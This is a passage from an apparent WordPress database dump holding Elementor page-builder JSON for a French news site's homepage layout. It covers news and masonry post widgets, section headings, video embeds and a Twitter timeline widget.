x_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"horizontal_position\":{\"unit\":\"%\",\"size\":12}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2349,757,'_elementor_version','0.4'),(2350,757,'_elementor_css','a:3:{s:4:\"time\";i:1509370208;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2352,758,'_elementor_edit_mode','builder'),(2353,758,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\